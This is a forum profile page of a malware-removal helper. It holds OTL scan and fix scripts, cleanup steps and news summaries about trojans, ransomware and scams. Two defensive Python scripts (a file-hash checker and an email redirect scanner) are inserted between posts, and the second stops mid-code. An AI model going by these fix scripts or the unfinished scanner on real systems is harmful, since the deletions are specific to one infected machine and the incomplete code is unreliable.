
Starbuck
ExTS Admin. Posts: 4,715. Days Won: 28.

Everything posted by Starbuck

  1. Hi Jim,
     Don't worry too much about that.
     Files Infected: C:\Program Files (x86)\Trend Micro\HijackThis\backups\backup-20100122-120940-917-rarype32.exe (Trojan.Bredolab) -> Quarantined and deleted successfully.
     It's just something MBAM found in your HJT backups.
     If you are referring to the extra.txt.... have a look here: C:\Users\Helen\Desktop
     There was a slight problem with the main OTL report as it didn't show the 'custom scans'.
     Please run OTL again. This time copy the lines below:
         netsvcs
         msconfig
         %SYSTEMDRIVE%\*.exe
         /md5start
         eventlog.dll
         scecli.dll
         netlogon.dll
         cngaudit.dll
         sceclt.dll
         ntelogon.dll
         logevent.dll
         iaStor.sys
         nvstor.sys
         atapi.sys
         IdeChnDr.sys
         viasraid.sys
         AGP440.sys
         vaxscsi.sys
         nvatabus.sys
         viamraid.sys
         nvata.sys
         nvgts.sys
         iastorv.sys
         ViPrt.sys
         eNetHook.dll
         ahcix86.sys
         KR10N.sys
         nvstor32.sys
         ahcix86s.sys
         nvrd32.sys
         symmpi.sys
         adp3132.sys
         /md5stop
         %systemroot%\*. /mp /s
         %systemroot%\system32\*.dll /lockedfiles
         %systemroot%\Tasks\*.job /lockedfiles
         %systemroot%\system32\drivers\*.sys /lockedfiles
         CREATERESTOREPOINT
     Right click in the Custom Scans/Fixes window (under the blue bar) and choose Paste.
     http://img.photobucket.com/albums/v708/starbuck50/new%20forum/scan-fix.png
     Click the Run Scan button.
     http://img.photobucket.com/albums/v708/starbuck50/runscan.png
     Do not change any settings unless otherwise told to do so. The scan won't take long.
     This scan will only produce the main.txt. Please post that along with the extras.txt found at: C:\Users\Helen\Desktop
     Thanks
  2. Hi mij,
     Glad to hear you had a bit of success with the problem.
     Still post the MBAM scan report and both reports from OTL and I'll take a look and see if there's any leftovers on the system for you.
     I like that term, sounds good
  3. Pirates beware.
     Security researchers from antivirus vendor Webroot Software warn that malware pushers are targeting StarCraft II pirates. A variant of the Zbot trojan is distributed on torrent and warez sites as a custom loader for the highly anticipated game.
     StarCraft II: Wings of Liberty is the sequel to one of the best-selling PC games in history. After being in development since as early as 2003, the new installment was one of the most anticipated games of the past several years.
     StarCraft II was officially released on Tuesday, 27 July 2010 and resulted in a real frenzy amongst avid gamers, who rushed to grab an early copy. However, as is all too familiar these days, not everyone is willing to pay in order to play the game and many would rather illegally download it off the Internet.
     “Apparently, there are a flood of torrents where gamers can download purportedly pirated versions of SC2. While your less ethical gamer might cheer this news, you might be less pleased to find out that some of the SC2 torrents appear to bring along a side order of malware,” Andrew Brandt, a threat researcher at Webroot, warns.
     One such example is a new variant of the notorious ZeuS trojan, which is being touted as a StarCraft II: Wings of Liberty loader. Game loaders are custom pieces of software which are used to bypass various DRM protections and allow non-genuine copies to run.
     ZeuS, also known as Zbot, is an information stealing trojan that is commonly used by cyber crooks to steal online banking accounts, credit card details and other credentials. The malware is one of the primary tools used to perform bank fraud over the Internet.
     Source: Zbot Variant Distributed as StarCarft II Game Loader - Pirates beware - Softpedia
  4. Hi mij, Have you tried to access the internet using 'safe mode with networking'? If it will connect that way.... try and download the programs that 'plastic nev' asked for directly to the infected system.
  5. You may well be right there. I've always thought the main problem is..... people can just buy a computer and get on the net without any problem. Most probably have no idea on PC security or privacy. It's a shame that everyone isn't made to complete a course before being allowed to run loose.
  6. One hundred million Facebook user profiles containing personal information such as e-mail addresses and phone numbers are now available as a 2.8GB torrent download.
     Ron Bowes of Skull Security created the torrent using a Web crawler program, harvesting data from public profiles of users who have chosen not to change their privacy settings. The file contains information for 1 in every 5 Facebook users, all those who are currently listed in the Facebook open access directory. Nothing is illegal about the torrent, because it simply uses data that is available to the public.
     Even those who have secured their own Facebook page may not be completely out of the clear. In a statement on his website Bowes said: "...this is a scary privacy issue. I can find the name of pretty much every person on Facebook...Once I have the name and URL of a user, I can view, by default, their picture, friends, information about them, and some other details. If the user has set their privacy higher, at the very least I can view their name and picture. So, if any searchable user has friends that are non-searchable, those friends just opted into being searched, like it or not!"
     Privacy is a huge concern for many Facebook users, and has put the social networking site in the news over and over again. While Facebook does have quite a few privacy options in place, it often makes understanding and finding those options as an individual user fairly complex. The process of making your Facebook profile unsearchable requires going through numerous different menu pages, a process that might frustrate some users into just not doing it at all.
     What about you? Have you made your profile unsearchable on Facebook, or are you comfortable with having your information included in the torrent file?
     Source: 100M Facebook Profiles Now Available For Download
  7. Let's find out if it's something that's been added to the browsers. Try running IE and Firefox without any addons and see if the problem still occurs.
     Internet Explorer: Click on Start >> All Programs >> Accessories >> System Tools >> Internet Explorer (no Add-ons). This opens up IE without ActiveX controls and browser extensions.
     Firefox: Click on Start >> All Programs >> Mozilla Firefox >> Mozilla Firefox (safe mode)
  8. Hi dazzac,
     I've had a bit more time to go over all the reports and posts again.
     Seems there's nothing to worry about. It's actually a legit marketing site.
     awin1.com | McAfee SiteAdvisor Software – Website Safety Ratings and Secure Search
     Affiliate Marketing – Affiliate Window – Affiliate Network
     Seems the shopping sites may be using this company for market research purposes.
     Obviously you have something installed on this system which you don't on the other system.
     What is this program in your uninstall list: MarketResearch
     I can't find any info on it.
     Perfectly legit. It's there to actually protect you.
     quote taken from: Opera Web Browser | Security
     also see here:
     Netcraft Anti-Phishing Toolbar
     toolbar.netcraft.com | WOT Reputation Scorecard | WOT Web of Trust
     I'd say if you do use these shopping sites frequently.... you are going to see these things.
  9. Hi John,
     Sorry for the delay. Ok, let's try and get some idea of what's going on.
     Step 1
     Download TFC by OldTimer to your desktop.
     Please double-click TFC.exe to run it. (Note: If you are running on Vista, right-click on the file and choose Run As Administrator.)
     It will close all programs when run, so make sure you have saved all your work before you begin.
     Click the Start button to begin the process. Depending on how often you clean temp files, execution time should be anywhere from a few seconds to a minute or two. Let it run uninterrupted to completion.
     Once it's finished it should reboot your machine. If it does not, please manually reboot the machine yourself to ensure a complete clean.
     Step 2
     Please download Malwarebytes Anti-Malware and save it to your desktop.
     Make sure you are connected to the Internet.
     Double-click on Download_mbam-setup.exe to install the application.
     When the installation begins, follow the prompts and do not make any changes to default settings.
     When installation has finished, make sure you leave both of these checked:
       • Update Malwarebytes' Anti-Malware
       • Launch Malwarebytes' Anti-Malware
     Then click Finish.
       • MBAM will automatically start and you will be asked to update the program before performing a scan. If an update is found, the program will automatically update itself. Press the OK button to close that box and continue. If you encounter any problems while downloading the updates, manually download them from here and just double-click on mbam-rules.exe to install.
       • On the Scanner tab: Make sure the "Perform Full Scan" option is selected. Then click on the Scan button.
       • If asked to select the drives to scan, leave all the drives selected and click on the Start Scan button.
       • The scan will begin and "Scan in progress" will show at the top. It may take some time to complete so please be patient.
       • When the scan is finished, a message box will say "The scan completed successfully. Click 'Show Results' to display all objects found".
       • Click OK to close the message box and continue with the removal process.
       • Back at the main Scanner screen, click on the Show Results button to see a list of any malware that was found.
       • Make sure that everything is checked, and click Remove Selected.
       • When removal is completed, a log report will open in Notepad and you may be prompted to restart your computer. (see Note below)
       • The log is automatically saved and can be viewed by clicking the Logs tab in MBAM.
       • Copy and paste the contents of that report in your next reply and exit MBAM.
     Note: If MBAM encounters a file that is difficult to remove, you will be presented with 1 of 2 prompts. Click OK to either and let MBAM proceed with the disinfection process. If asked to restart the computer, please do so immediately. Failure to reboot will prevent MBAM from removing all the malware.
     Step 3
     Download OTL to your desktop.
     Double click on the icon to run it. Make sure all other windows are closed and to let it run uninterrupted.
     When the window appears, underneath Output at the top change it to Minimal Output.
     Check the boxes beside LOP Check and Purity Check.
     http://img.photobucket.com/albums/v708/starbuck50/new/newOtl2.png
     Now copy the lines in the codebox below.
         netsvcs
         msconfig
         %SYSTEMDRIVE%\*.exe
         /md5start
         eventlog.dll
         scecli.dll
         netlogon.dll
         cngaudit.dll
         sceclt.dll
         ntelogon.dll
         logevent.dll
         iaStor.sys
         nvstor.sys
         atapi.sys
         IdeChnDr.sys
         viasraid.sys
         AGP440.sys
         vaxscsi.sys
         nvatabus.sys
         viamraid.sys
         nvata.sys
         nvgts.sys
         iastorv.sys
         ViPrt.sys
         eNetHook.dll
         ahcix86.sys
         KR10N.sys
         nvstor32.sys
         ahcix86s.sys
         nvrd32.sys
         symmpi.sys
         adp3132.sys
         /md5stop
         %systemroot%\*. /mp /s
         %systemroot%\system32\*.dll /lockedfiles
         %systemroot%\Tasks\*.job /lockedfiles
         %systemroot%\system32\drivers\*.sys /lockedfiles
         CREATERESTOREPOINT
     Right click in the Custom Scans/Fixes window (under the blue bar) and choose Paste.
     http://img.photobucket.com/albums/v708/starbuck50/new%20forum/scan-fix.png
     Click the Run Scan button.
     http://img.photobucket.com/albums/v708/starbuck50/runscan.png
     Do not change any settings unless otherwise told to do so. The scan won't take long.
     When the scan completes, it will open two notepad windows: OTL.Txt and Extras.Txt. These are saved in the same location as OTL.
     Please copy (Edit->Select All, Edit->Copy) the contents of these files, one at a time, and post them with your next reply.
     In your next reply, please submit:
       • MBAM scan report
       • Both reports from OTL
     If the reports are too big to post here, add them as attachments.
     Thanks.
  10. Hi clucky,
     Looks like you have a little work to do. ;)
     Step 1
     Click on Start... Control Panel and double-click on Add or Remove Programs.
     From within Add or Remove Programs uninstall the following:
       • J2SE Runtime Environment 5.0 Update 3
       • Java™ SE Runtime Environment 6
       • Java™ 6 Update 3
       • Java 2 Runtime Environment, SE v1.4.2_03
     These are old versions which should have been removed when Java was updated.
     Do not remove: Java™ 6 Update 11 for the time being.
     Reboot your system when completed.
     Step 2
     Double click on OTL.exe to run it.
     Copy the lines in the codebox below. (Make sure that :Otl is on the first line.)
         :Otl
         O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - No CLSID value found.
         O4 - HKCU..\Run: [{30689C70-3B29-5DD6-2DB0-B2931B8E5205}] C:\Documents and Settings\Administrator.JENNIFER.000\Application Data\Qaohf\uliri.exe (Uszil Uxzngel Krqunp)
         O9 - Extra Button: Run IMVU - {d9288080-1baa-4bc4-9cf8-a92d743db949} - C:\Documents and Settings\Jennifer Hayden\Start Menu\Programs\IMVU\Run IMVU.lnk File not found
         [2010/07/20 19:59:03 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Administrator.JENNIFER.000\Application Data\Ekxyo
         [2010/07/20 05:45:03 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Administrator.JENNIFER.000\Application Data\Qaohf
         [2010/07/19 20:37:44 | 000,000,000 | ---D | C] -- C:\Documents and Settings\NetworkService\Local Settings\Application Data\atbbpfdcu
         @Alternate Data Stream - 128 bytes -> C:\Documents and Settings\All Users\Application Data\TEMP:2B99FE60
         @Alternate Data Stream - 118 bytes -> C:\Documents and Settings\All Users\Application Data\TEMP:375A40C3
         @Alternate Data Stream - 100 bytes -> C:\Documents and Settings\All Users\Application Data\TEMP:5D10517E
         :commands
         [emptytemp]
         [purity]
         [RESETHOSTS]
         [EMPTYFLASH]
     Return to OTL, right click in the Custom Scans/Fixes window (under the blue bar) and choose Paste.
     http://img.photobucket.com/albums/v708/starbuck50/new%20forum/scan-fix.png
     Click the red Run Fix button.
     http://img.photobucket.com/albums/v708/starbuck50/runfixbutton.png
     OTL will reboot your system once the fix has completed.
     After the reboot, you may need to double click OTL to launch the program and retrieve the log.
     Copy and paste the contents of the OTL log that comes up after the fix in your next reply.
     If you lose the report, there will be a copy here: C:\_OTL\MovedFiles
     Step 3
     You are missing one important program on that computer: an antivirus. This is somewhat suicidal in today's digital world.
     You need to install an antivirus program as soon as you can and run a complete scan of the computer:
       • Avira AntiVir
       • Avast free
       • MS Security Essentials ... see note*
     Install one of these, update the definitions and then run a full scan. Let it quarantine/delete anything it finds. Let me know if there is anything that it reports but cannot remove.
     Note*: Upon installation MS Security Essentials will check that your OS is a legal copy.
     In your next reply, please submit:
       • OTL fix report
       • and let me know if the Anti Virus scan found/removed anything
     Thanks.
  11. Hi clucky, It's ok, I have enough information. Give me time to go through the reports and I'll get back to you ASAP.
  12. My system originally came with a 250w PSU; I removed this and added a 450w PSU. Like Match says, as long as the connectors fit (and most will) it will cause no harm at all. It's like taking a 1.0l car engine out and adding a 2.0l one. The extra power is there if you need it, but if you don't need it.... it won't work overtime.
  13. Hi clucky,
     Sorry for the late response.
     Just one point I'd like to make: If you think you have malware, never turn off your restore points. Even a bad restore point is better than no restore point. If you don't use system restore.... the bad restore points won't make any difference to you. We always clean them at the end of the cleaning process anyway.
     Without it, I'm out of a job... so keep it coming http://fc06.deviantart.com/fs4/i/2004/250/7/1/ROFL_by_b4sti.gif
     Ok, let's get to the bottom of this:
     Step 1
     Please download exeHelper to your desktop.
     If your AV program throws up a warning about the program, ignore the warning. Some AV's flag this program because of how it works... that's all.
     Double-click on exeHelper.com to run the fix.
     A black window should pop up; press any key to close once the fix is completed.
     Post the contents of exehelperlog.txt (will be created in the directory where you ran exeHelper.com and should open at the end of the scan).
     Note: If the window shows a message that says "Error deleting file", please re-run the program before posting a log - and post the two logs together (they will both be in the one file).
     Step 2
     Download OTL to your desktop. Right click on the link and select 'Save Link/Target As'. If you have problems, try this download link: OTL
     Double click on the icon to run it. Make sure all other windows are closed and to let it run uninterrupted.
     When the window appears, underneath Output at the top change it to Minimal Output.
     Check the boxes beside LOP Check and Purity Check.
     http://img.photobucket.com/albums/v708/starbuck50/new/newOtl2.png
     Now copy the lines below.
         netsvcs
         msconfig
         %SYSTEMDRIVE%\*.exe
         /md5start
         eventlog.dll
         scecli.dll
         netlogon.dll
         cngaudit.dll
         sceclt.dll
         ntelogon.dll
         logevent.dll
         iaStor.sys
         nvstor.sys
         atapi.sys
         IdeChnDr.sys
         viasraid.sys
         AGP440.sys
         vaxscsi.sys
         nvatabus.sys
         viamraid.sys
         nvata.sys
         nvgts.sys
         iastorv.sys
         ViPrt.sys
         eNetHook.dll
         ahcix86.sys
         KR10N.sys
         nvstor32.sys
         ahcix86s.sys
         nvrd32.sys
         symmpi.sys
         adp3132.sys
         /md5stop
         %systemroot%\*. /mp /s
         %systemroot%\system32\*.dll /lockedfiles
         %systemroot%\Tasks\*.job /lockedfiles
         %systemroot%\system32\drivers\*.sys /lockedfiles
         CREATERESTOREPOINT
     Right click in the Custom Scans/Fixes window (under the blue bar) and choose Paste.
     http://img.photobucket.com/albums/v708/starbuck50/new%20forum/scan-fix.png
     Click the Run Scan button.
     http://img.photobucket.com/albums/v708/starbuck50/runscan.png
     Do not change any settings unless otherwise told to do so. The scan won't take long.
     When the scan completes, it will open two notepad windows: OTL.Txt and Extras.Txt. These are saved in the same location as OTL.
     Please copy (Edit->Select All, Edit->Copy) the contents of these files, one at a time, and post them with your next reply.
     In your next reply, please submit:
       • exehelperlog.txt
       • both reports from OTL
     If the reports are too big to post, add them as attachments.
     Thanks.
  14. I know a few malware removal teachers that would love to get their systems that infected. http://fc06.deviantart.com/fs4/i/2004/250/7/1/ROFL_by_b4sti.gif
     Seriously though, it does look as though security had been lacking for a while on your system.
     Sometimes when people have to reinstall the OS, they ask what they should have in the way of security. This is what I normally say to them:
     To find out how you may have been infected.... read this topic: So how did i get infected?
     A good Anti-Virus protector:
     Here's a few good 'free' programs.
       • Avira AntiVir
       • Avast free
       • MS Security Essentials ... see note*
     Only install one of these.
     Note*: Upon installation MS Security Essentials will check that your OS is a legal copy.
     A 3rd party Firewall:
     Some free firewalls are:
       • Online Armor Free
       • Outpost Firewall Free
       • Sunbelt Personal Firewall
     Only install one of these Firewalls.
     A resident Anti-Malware scanner:
     Installing Windows Defender and activating its 'Realtime Protection' will help to keep the nasties away.
     Scan regularly with a 'Stand Alone' Anti-Malware scanner:
     Installing another scanner that you can run once or twice a week is always beneficial. Something like:
       • Malwarebytes Anti-Malware
       • SUPERAntiSpyware
     Remember to update these programs each time before running. You can install more than one of these if you only run them as stand alone programs.
     Install SpywareBlaster - SpywareBlaster will add a large list of programs and sites into your Internet Explorer settings that will protect you from running and downloading known malicious programs. A tutorial on installing & using this product can be found here: Using and installing SpywareBlaster
     Keep your system clean of temp files etc, using a 'Cleaner':
     Cleaners are programs that will help to clean out your:
       • Windows temp files
       • Current user temp files
       • Cookies
       • Temporary Internet files
       • Browser history
       • Recycle bin
       • Etc.......
     In other words.... all the crap that you accumulate over the course of your browsing and day to day usage of your PC.
     Programs like:
       • TFC by OldTimer
       • CCleaner
       • ATF Cleaner
     Obviously this is not a complete list of programs available, plus I've stuck to 'Free' programs. If you want 'Paid for' programs... you will have a greater choice.
     Hope this gives you some idea.
     A bit late in the day, but: Safe surfing. http://fc08.deviantart.net/fs71/f/2010/033/b/3/Computer_addict__by_Sinister_Starfeesh.gif
  15. Hi there and welcome to ExtremeTech.support - Free PC Help
     I've moved your thread here as this is the correct place to get the help you need.
     Ok, let's see what we can do about this.
     Step 1
     Please download exeHelper to your desktop.
     If your AV program throws up a warning about the program, ignore the warning. Some AV's flag this program because of how it works... that's all.
     Double-click on exeHelper.com to run the fix.
     A black window should pop up; press any key to close once the fix is completed.
     Post the contents of exehelperlog.txt (will be created in the directory where you ran exeHelper.com and should open at the end of the scan).
     Note: If the window shows a message that says "Error deleting file", please re-run the program before posting a log - and post the two logs together (they will both be in the one file).
     Step 2
     Download OTL to your desktop. Right click on the link and select 'Save Link/Target As'. If you have problems, try this download link: OTL
     Double click on the icon to run it. Make sure all other windows are closed and to let it run uninterrupted.
     When the window appears, underneath Output at the top change it to Minimal Output.
     Check the boxes beside LOP Check and Purity Check.
     http://img.photobucket.com/albums/v708/starbuck50/new/newOtl2.png
     Now copy the lines below.
         netsvcs
         msconfig
         %SYSTEMDRIVE%\*.exe
         /md5start
         eventlog.dll
         scecli.dll
         netlogon.dll
         cngaudit.dll
         sceclt.dll
         ntelogon.dll
         logevent.dll
         iaStor.sys
         nvstor.sys
         atapi.sys
         IdeChnDr.sys
         viasraid.sys
         AGP440.sys
         vaxscsi.sys
         nvatabus.sys
         viamraid.sys
         nvata.sys
         nvgts.sys
         iastorv.sys
         ViPrt.sys
         eNetHook.dll
         ahcix86.sys
         KR10N.sys
         nvstor32.sys
         ahcix86s.sys
         nvrd32.sys
         symmpi.sys
         adp3132.sys
         /md5stop
         %systemroot%\*. /mp /s
         %systemroot%\system32\*.dll /lockedfiles
         %systemroot%\Tasks\*.job /lockedfiles
         %systemroot%\system32\drivers\*.sys /lockedfiles
         CREATERESTOREPOINT
     Right click in the Custom Scans/Fixes window (under the blue bar) and choose Paste.
     http://img.photobucket.com/albums/v708/starbuck50/new%20forum/scan-fix.png
     Click the Run Scan button.
     http://img.photobucket.com/albums/v708/starbuck50/runscan.png
     Do not change any settings unless otherwise told to do so. The scan won't take long.
     When the scan completes, it will open two notepad windows: OTL.Txt and Extras.Txt. These are saved in the same location as OTL.
     Please copy (Edit->Select All, Edit->Copy) the contents of these files, one at a time, and post them with your next reply.
     In your next reply, please submit:
       • exehelperlog.txt
       • both reports from OTL
     If the reports are too big to post here, add them as attachments.
     Thanks.
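The /md5start ... /md5stop block that posts 9, 13 and 15 above all paste into OTL asks the tool to hash every copy of the listed system files, so that a patched driver (one whose hash no longer matches a known-good copy) stands out. The script below is an added example, not OTL's own code and not something from the posts: it walks a directory tree for a subset of those file names, hashes every copy it finds and compares each one against a baseline of known-good MD5s, reporting "ok", "MISMATCH" or "no baseline". The directory tree, the file contents and the baseline hashes are all constructed for the demonstration; on a real machine the baseline would come from a clean install or the vendor's published file hashes, and the root would be %systemroot%.

```python
import hashlib
import os
import shutil
import tempfile
from pathlib import Path

# A subset of the names from the /md5start ... /md5stop block in the OTL scripts above.
WATCHED_NAMES = ["atapi.sys", "iastor.sys", "nvstor.sys", "eventlog.dll", "netlogon.dll"]


def md5_of(path):
    """MD5 hex digest of a file, read in chunks so large drivers need not fit in memory."""
    digest = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def find_copies(root, names):
    """Walk root and return {name: [paths]} for every copy of each watched name (case-insensitive)."""
    wanted = {n.lower() for n in names}
    copies = {}
    for dirpath, _dirs, filenames in os.walk(root):
        for fn in filenames:
            if fn.lower() in wanted:
                copies.setdefault(fn.lower(), []).append(os.path.join(dirpath, fn))
    return copies


def check_hashes(root, names, baseline):
    """Hash every copy found and judge it against the baseline.

    Returns a list of (name, path, md5, verdict); verdict is "ok" (hash is in the
    baseline), "MISMATCH" (a baseline exists but the hash differs) or
    "no baseline" (nothing to compare against, so it needs manual review).
    """
    results = []
    for name, paths in sorted(find_copies(root, names).items()):
        known_good = {h.lower() for h in baseline.get(name, ())}
        for path in sorted(paths):
            digest = md5_of(path)
            if not known_good:
                verdict = "no baseline"
            elif digest in known_good:
                verdict = "ok"
            else:
                verdict = "MISMATCH"
            results.append((name, path, digest, verdict))
    return results


def build_demo_tree():
    """Constructed stand-in for %systemroot%: clean files plus one modified copy. Returns (root, baseline)."""
    root = tempfile.mkdtemp(prefix="md5check_demo_")
    drivers = Path(root, "system32", "drivers")
    cache = Path(root, "system32", "dllcache")
    drivers.mkdir(parents=True)
    cache.mkdir(parents=True)
    clean_atapi = b"constructed clean atapi.sys bytes"
    clean_nvstor = b"constructed clean nvstor.sys bytes"
    # The in-use driver has bytes appended to it; the cached copy is still clean.
    (drivers / "atapi.sys").write_bytes(clean_atapi + b"\x90" * 32)
    (cache / "atapi.sys").write_bytes(clean_atapi)
    (drivers / "nvstor.sys").write_bytes(clean_nvstor)
    # A watched file with no baseline entry, to show the "needs review" path.
    Path(root, "system32", "eventlog.dll").write_bytes(b"constructed eventlog.dll bytes")
    baseline = {  # constructed known-good hashes (real ones come from a clean install or vendor lists)
        "atapi.sys": [hashlib.md5(clean_atapi).hexdigest()],
        "nvstor.sys": [hashlib.md5(clean_nvstor).hexdigest()],
    }
    return root, baseline


def run_demo():
    """Build the sample tree, check it, remove it again and return the findings."""
    root, baseline = build_demo_tree()
    try:
        return check_hashes(root, WATCHED_NAMES, baseline)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for name, path, digest, verdict in run_demo():
        print(f"{verdict:12} {digest}  {path}")
```

Two copies of the same driver with different hashes is exactly the situation worth a closer look: either a legitimate update left the cache stale, or the in-use copy has been altered. The "no baseline" verdict is deliberately not treated as clean; a hash you cannot compare tells you nothing either way.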
  16. Hi atwitsend,
     There's no nice way to say this but..... your system is a lost cause.
     That's the best collection of malware I've ever seen on a system. I started to list out the actual malware infections.... but I lost count. There are multiple backdoor trojans, plus even your legit programs have been infected.
     The version of MBAM you ran was way out of date. In fact it's been updated 287 times since you last updated it.
     Your personal details will have been severely compromised. So if you do any form of online banking, use of credit cards etc.... inform these companies straight away and change all passwords..... do this from a malware free system.
     Your version of XP was well out of date as well. So you were missing loads of security updates.
     It's time for a reformat/reinstall I'm afraid. But I think you had already guessed that.
  17. Hi, it would also help enormously if you could post the MBAM report. It may have removed something by mistake. Start Malwarebytes AntiMalware. Click on the logs tab. The logs are date stamped ... double click on the log that showed the infection items. It'll open in notepad. Can you copy this to another system so you can post it here along with the answers to KenB's questions. Thanks
  18. Company says some PowerEdge R410 machines at risk.
     Dell has confirmed that some of its PowerEdge R410 servers have been shipping with malware preinstalled on the motherboard. The malware is in a section of the server motherboard's firmware, according to reports, and is an unidentified spying application.
     Dell said that the problem does not harm servers running non-Windows operating systems, and is not an issue with new systems shipped directly from the manufacturer.
     "We have identified a potential issue with our service motherboard stock, and are taking preventative action with our customers accordingly," said the company in a community forum post. "The potential issue involves a small number of PowerEdge server motherboards sent out through service dispatches that may contain malware. This malware code has been detected on the embedded server management firmware."
     Dell said that it will contact the small number of customers with infected motherboards and send round engineers to rectify the problem.
     Malware embedded in this way would be undetectable to traditional security software and could pose a major threat.
     Source: Dell warns of malware-infected server motherboards - V3.co.uk - formerly vnunet.com
  19. http://fc06.deviantart.net/fs27/f/2008/184/4/2/Happy_Birthday_Flag_by_Chaosbrazer.gif schrauber Don't party too hard. http://fc02.deviantart.net/fs25/f/2008/125/8/7/PARTY_by_Hipityhop.png
  20. Leads users to a survey scam.
     A new Facebook spam campaign is using a Coca Cola horrific video lure to trick users into visiting a malicious page. Victims are encouraged to propagate the rogue messages and end up with their personal information stolen.
     “I am part of the 98.0% of people that are NEVER gonna drink Coca Cola again after this HORRIFIC video ? Find out the TRUTH about Coke!!!” the spam reads. This can be added in various places, for example as a NewsFeed entry or even a Calendar event.
     Clicking on the link takes users to an external site displaying an image mimicking an embedded video player. However, instructions on the page reveal that the video can only be played if the user agrees to spread the news about it on Facebook.
     This is allegedly done in three steps. The first requires the user to “Like” the page. Judging by the number displayed next to the Like button, over 19,000 people have fallen for this scam so far. The second requirement is to “Share” the link on Facebook, while the third step asks the user to copy and paste the spam message cited above seven times on Facebook.
     “The page claims to poll whether you have shared the link enough (in order to allow the video to be viewed). But when you realise you're not making any progress - despite your valiant attempts to recommend the link to all and sundry - you might hit the link which says: >>>Cant Be Botherd To Wait? --> Click Here To Skip This<<<. And this link takes you to a survey which asks you for all sorts of personal information,” Graham Cluley, senior technology consultant at Sophos, warns.
     While this scam relies on social engineering tricks to convince Facebook users into liking the page, there are methods to achieve the same result without their permission. Just yesterday, we reported a clickjacking vulnerability, which could be exploited to do exactly that in a manner that is completely transparent to users.
     Source: http://news.softpedia.com/news/Coca-Cola-Shocking-Video-Spam-Spreading-on-Facebook-147778.shtml
  21. Locks down computers and asks for mobile credit recharge.
     A new piece of ransomware is currently circulating in the wild and prevents victims from properly using their computers. The malicious program also displays obscene messages in an attempt to force users to recharge a mobile phone account.
     Ransomware is a term used to refer to computer trojans which disable critical system functionality and ask for a ransom in order to restore it. The crimeware model is seen by many security experts as the next step in the evolution of scareware, programs which scare users into paying unnecessary license fees.
     “In this case, the Trojan (which we and several other AV companies call Trojan-Ransom-Krotten) thoroughly locks down the infected system then demands payment—in the form of credit paid to the Ukrainian mobile phone provider Kyivstar, which the victim then has to transfer to the malware distributor’s account,” explains Andrew Brandt, a security researcher at security vendor Webroot, who analyzed the malicious program.
     According to the malware analyst the trojan installer is called chatadmin.exe and was created with Sign 0f Misery (S0M), a tool for people who lack the programming skills necessary to create applications. Once executed on the system, the installer performs several checks, drops the payload and forces a reboot.
     The system is locked down by modifying around forty registry entries, which are normally intended for system administrators. They affect the users' ability to run most applications, open many file types, close opened windows or access the Start menu. The trojan also replaces the time in the system tray with a Russian curse word and adds an obscene message to the Internet Explorer title bar.
     Every time an infected computer reboots the user is prompted with instructions to send a mobile credit recharge code for 30 Grivna (close to $4) to an email address. The message claims that people who comply with the request will receive a program that can be used to release their computer.
     In order to protect themselves against this threat users should run an up-to-date and capable antivirus product. According to the Webroot researcher, the trojan installer will halt the infection process and quit if a file called 290564175.txt is located in the root of the C: drive.
     Source: Obscene Ukrainian Ransomware in the Wild - Locks down computers and asks for mobile credit recharge - Softpedia
  22. http://fc06.deviantart.com/fs27/f/2008/184/4/2/Happy_Birthday_Flag_by_Chaosbrazer.gif PseFrank Hope your day has been a good one. http://fc07.deviantart.com/images3/i/2004/146/9/1/Two_thumbs_up.gif
  23. Hi Dazzac, No problem at all. It may well be ok now, the CF scan is a double check just to make sure. Best to be safe than sorry. :)
  24. Attached HTML files redirect to malicious websites.
     A new email spam campaign spreads emails masquerading as payment requests coming from eBay. Users are lured into opening an attached HTML file which redirects them to a malware pushing website.
     The rogue email messages have a subject of “Payment request from.” This is most likely a spelling mistake, the spammers probably intending to write “payment request form.” This is suggested by the fact that the attached HTML file is called form.html. There is no message contained in the body, but the “From” field is forged to appear as if the emails were sent from an eBay@reply1.ebay.com address.
     “Of course it's a sneaky piece of social engineering on the behalf of the hackers. Many people would be tempted to open the attachment to find out what on earth the email is about. And opening the attachment (which Sophos detects as Troj/JSRedir-BV) redirects your web browser to a recently compromised webpage on a legitimate site infected with Mal/Iframe-Q,” Graham Cluley, senior technology consultant at Sophos, writes.
     In fact there are two parts to this attack. First, a redirect takes users to a common Canadian Pharmacy spam site, tricking them into believing that nothing truly dangerous happened. However, in the background a rogue IFrame loads a malicious script from a third party website. This code has the purpose of silently downloading and executing a piece of malware onto the visitors' computers.
     Such attacks are known as drive-by downloads and this particular one is used to push a Zbot variant. Zbot, or ZeuS, is a computer trojan commonly used to steal online banking credentials and other financial information. It is the weapon of choice for fraudsters looking to siphon money out of the bank accounts of individuals, companies and organizations everywhere.
     Source: Fake eBay Payment Request Emails Lead to Malware - Attached HTML files redirect to malicious websites - Softpedia
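Post 24 above describes an HTML attachment that sends the browser to a spam page while a hidden IFrame loads a script from a third site. As an added example (not Sophos's detection logic and not code from the post), the script below parses an email, pulls out its HTML attachments and flags the indicators that description implies: meta refresh tags, JavaScript that changes the page location, hidden or 1x1 IFrames and externally sourced scripts. The sample message, the form.html attachment and the example domains inside it are constructed here to mirror the post's description; they are not the campaign's real addresses. Only the Python standard library is used.

```python
import email
import re
from email import policy
from email.message import EmailMessage
from html.parser import HTMLParser

# JavaScript expressions that move the browser to another page.
REDIRECT_JS = re.compile(
    r"\b(?:window|document|top|self|parent)\.location\b|\blocation\.(?:href|replace|assign)\b",
    re.IGNORECASE,
)


def is_hidden(attrs):
    """True for an element styled away or sized down to nothing (display:none, 1x1 IFrame)."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    try:
        width = int(attrs.get("width") or 100)
        height = int(attrs.get("height") or 100)
    except ValueError:  # e.g. "100%": treat as visible
        return False
    return width <= 1 or height <= 1


class RedirectScanner(HTMLParser):
    """Collects (kind, detail) findings for redirect and drive-by indicators in one HTML document."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            self.findings.append(("meta-refresh", a.get("content") or ""))
        elif tag == "iframe":
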